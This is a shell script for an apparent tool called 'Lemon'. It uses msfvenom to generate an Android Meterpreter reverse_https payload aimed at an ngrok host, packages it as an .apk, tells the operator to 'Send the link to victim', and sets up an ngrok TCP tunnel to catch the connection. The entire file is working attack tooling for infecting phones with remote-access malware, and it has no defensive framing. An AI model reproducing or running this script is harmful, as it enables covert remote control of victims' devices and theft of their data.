#!/bin/sh

echo "[+] PLEASE ENTER A PORT (more than 1024)"

read -p '>>> ' port
if [ $port -le 1024 ]
then
	printf "\033[1;31m[-] Port must be more than 1024\033[0m\n"
else
	echo '[+] Do you want to continue?'

	read -p '>>> ' ans
	if [ $ans = yes ]
	then
		echo "[+] Enter Payload's name (Put .apk after your name)"
		read -p '>>> ' name
		echo "[+] Put your payload's name after the link you get from sh ssh" 
		echo "[+] For Example : lente.serveo.net/yourpayload.apk"
		echo "[+] Send the link to victim"
		echo "[+] This may take a few minutes"

		msfvenom -p android/meterpreter/reverse_https LHOST=0.tcp.ngrok.io LPORT=$port R> $HOME/Lemon/$name & PID=$!

		echo "Generating Payload.."
		printf "["
		while kill -0 $PID 2> /dev/null; do
			printf  "▓"
			sleep 2
		done
		printf "\nGenerated!!\n"
		
		echo "[+] Choose forwarding service"
		echo " 1. Serveo [ NOT AVAILABLE ]" 
		echo " 2. Ngrok "

		read -p '>>> ' ser
		if [ $ser = 2 ] ; then
			echo "Do you have Ngrok installed?"

			read -p '>>> ' ngr
			if [ $ngr = no ] ; then
				curl --output ngrok.zip -0 https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
				unzip ngrok.zip
				chmod +x ngrok
				ngrok tcp $port
			else
				ngrok tcp $port
			fi
		else
			echo "[+] Serveo is not available"
		fi
	else
		printf "\033[1;31m[-] Exiting..\033[0m\n"
	fi
fi





